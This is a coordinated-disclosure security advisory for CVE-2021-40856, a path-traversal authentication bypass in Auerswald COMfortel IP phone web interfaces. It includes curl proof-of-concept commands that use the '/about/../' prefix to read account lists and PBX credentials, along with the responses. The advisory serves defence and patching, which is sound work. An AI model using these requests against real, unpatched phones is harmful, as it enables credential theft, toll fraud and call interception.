RedTeam Pentesting discovered a vulnerability in the
web-based
configuration management interface of the Auerswald COMfortel 1400
and
2600 IP desktop phones. The vulnerability allows accessing
configuration
data and settings in the web-based management interface without
authentication.
Details
=======
Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP,
COMfortel 3600 IP
Affected Versions: <= 2.8F
Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP,
COMfortel 3600 IP)
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.auerswald.de
Vendor Status: fixed version released
Advisory URL:
https://www.redteam-pentesting.de/advisories/rt-sa-2021-004
Advisory Status: published
CVE: CVE-2021-40856
CVE URL:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
Introduction
============
"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone
(SIP and
IP system phone), with 4.3" colour touch display and
preconfigured
answering machine"
(from the vendor's homepage)
More Details
============
During a penetration test it was discovened that several VoIP
phones
(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald
allow
accessing administrative functions without login credentials,
bypassing
the authentication. This can be achieved by simply prefixing
API
endpoints that require authentication with "/about/../", since
the
"/about" endpoint does not require any authentication.
Proof of Concept
================
The phones run a web-based management interface on Port 80. If
accessed,
the HTTP response code 401 together with a website redirecting to
the
path "/statics/pageChallenge.html" is returned. This can for
example be
seen using the command-line HTTP client curl[1] as follows:
------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/'
HTTP/1.1 401 Unauthorized
[...]
<!DOCTYPE html><html><head><meta
http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------
The website contains JavaScript code that requests the path
"/about?action=get" and loads a JSON document (formatted and
shortened
to increase readability):
------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/about?action=get'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3673
Date: Mon, 30 Aug 2021 08:39:24 GMT
Server: lighttpd
{
"DATA": {
"firmware": {
"TYPE": "DATAITEM",
"VALUE": "2.8E",
"KEY": "firmware"
},
"serial": {
"TYPE": "DATAITEM",
"VALUE": "1234567890",
"KEY": "serial"
},
[...]
}
}
------------------------------------------------------------------------
Among other information, this JSON document contains the serial
number
and firmware version displayed on the website. This action can
be
accessed without authentication. Other endpoints require
authentication,
for example the path "/tree?action=get", from which the menu
structure
is loaded after successful authentication:
------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/tree?action=get'
HTTP/1.1 401 Unauthorized
[...]
<!DOCTYPE html><html><head><meta
http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------
During the penetration test, it was discovered that this action
can
successfully be requested by inserting the prefix "/about/../". In
order
to prevent curl from normalizing the URL path, the option
"--path-as-is"
must be supplied:
------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../tree?action=get'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3808
Date: Mon, 30 Aug 2021 08:42:11 GMT
Server: lighttpd
{
"TYPE": "TREENODEPAGE",
"ITEMS": {
"COUNT": 2,
"TYPE": "ITEMLIST",
"1": {
"id": 31,
"text": "applications_settings",
"TYPE": "TREENODEPAGE",
"ITEMS": {
"COUNT": 1,
"TYPE": "ITEMLIST",
"0": {
"target": "pageFunctionkeys.html",
"id": 32,
"action": "/functionkeys",
"text": "key_app",
"pagename": "Functionkeys",
"TYPE": "TREENODEPAGE"
}
}
},
[...]
}
}
------------------------------------------------------------------------
The endpoint "/account" allows listing account data:
------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=list'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd
{
"DATA": {
[...]
"accountList0": {
"KEY": "accountList0",
"COUNT": 1,
"TYPE": "DATAMODEL",
"VALUE": {
"0": {
"ID": 32327,
"PARENTID": 0,
"PROVIDER": "ProviderName",
"NAME": "123 Example User",
"STATUS": 4,
"DEFAULT": 1
}
},
[...]
},
}
}
------------------------------------------------------------------------
The ID 32327 can then be used to get details about that
particular
account, including the username and password:
------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=get&itemID=32327'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd
{
"DATA": {
[...]
"Benutzer": {
"TYPE": "DATAITEM",
"VALUE": "123",
"KEY": "Benutzer"
},
"Passwort": {
"TYPE": "DATAITEM",
"VALUE": "secret",
"KEY": "Passwort"
},
[...]
}
}
------------------------------------------------------------------------
Using a script for Zed Attack Proxy[2], RedTeam Pentesting
managed to
access and use the web-based management interface as if regular
login
credentials were presented.
It is likely that other functionality can be accessed in the
same way,
to for example change settings or activate the integrated option
for
recording the Ethernet traffic.
Workaround
==========
Disable the web-based management interface if possible.
Fix
===
Upgrade to a firmware version which corrects this vulnerability.
Security Risk
=============
Inserting the prefix "/about/../" allows bypassing the
authentication
check for the web-based configuration management interface. This
enables
attackers to gain access to the login credentials used for
authentication at the PBX, among other data.
Attackers can then authenticate at the PBX as the respective
phone and
for example call premium rate phone lines they operate to
generate
revenue. They can also configure a device they control as the PBX
in the
phone, so all incoming and outgoing phone calls are intercepted and
can
be recorded. The device also contains a function to record all
Ethernet
data traffic, which is likely affected as well.
Overall, the vulnerability completely bypasses the
authentication for
the web-based management interface and therefore poses a high
risk.
References
==========
[1] https://curl.se
[2] https://github.com/zaproxy/zaproxy/
Timeline
========
2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-04 Vendor provides access to device with fixed firmware
2021-10-05 RedTeam Pentesting examines device, vulnerability seems
to be corrected
2021-10-14 Vendor releases corrected firmware version 2.8G
2021-12-06 Advisory published
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed
by a
team of specialised IT-security experts. Hereby, security
weaknesses in
company networks or products are uncovered and can be fixed
immediately.
As there are only few experts in this field, RedTeam Pentesting
wants to
share its knowledge and enhance the public knowledge with research
in
security-related areas. The results are made available as
public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join
our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
